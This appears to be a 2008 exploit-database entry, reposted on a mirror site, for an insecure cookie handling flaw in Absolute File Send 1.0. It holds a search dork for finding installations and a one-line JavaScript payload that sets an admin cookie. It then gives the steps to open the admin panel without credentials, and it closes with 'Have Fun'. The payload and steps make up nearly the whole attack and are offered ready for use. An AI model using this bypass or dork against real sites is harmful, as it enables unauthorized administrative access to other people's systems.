[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Absolute File Send 1.0 Remote Cookie Handling Vulnerability
# Published : 2008-10-30
# Author : Hakxer
# Previous Title : MyPHP Forum <= 3.0 Edit Topics/Blind SQL Injection Vulnerabilities
# Next Title : Absolute Podcast 1.0 Remote Insecure Cookie Handling Vulnerability


###############################################################################################
 _____    ____   __  ___    ______   ______       |   ____   _____     _____
|        / ___|    / /   / ____|  /      |      |  |      |  _     |
|_____  | |  _     V /    | |      |      |   ___|  |_____ | |_)  |  |_____
|       | |_ ||    | |     | |____  |      |  |   |  |      |   _  |        |
|_____   ____|    |_|      _____|  _____/  |___|  |____  |__| _  ______|

# Author : Hakxer
# Home : Www.educ-up.com
# Type Gap : Insecure cookie handling 
# script : Absloute File Send [see script] http://www.xigla.com/afilesend/demo.htm
# Greetz : Allah , Egyptian x Hacker , all my team , All educ-up member
# Team : EgY Coders 
#################################################################################################

# Dork : "Powered by Absolute File Send"

# First go to Admin panel : http://www.xigla.com/afilesend/demo/login.aspx
# Exploit :
# [~]  javascript:document.cookie="xlaAFSuser=p=admin";
# Second Go to http://www.xigla.com/afilesend/demo/menu.aspx
# See Admin panel .. 

# Have Fun :D


###############################################################################

-------------------------------- The End of Gap -----------------------------------

## Contact : aq5@windowslive.com
### Muslim Hacker .. I love you Mohammed Rasull Allah 
######################################################

# www.Syue.com [2008-10-30]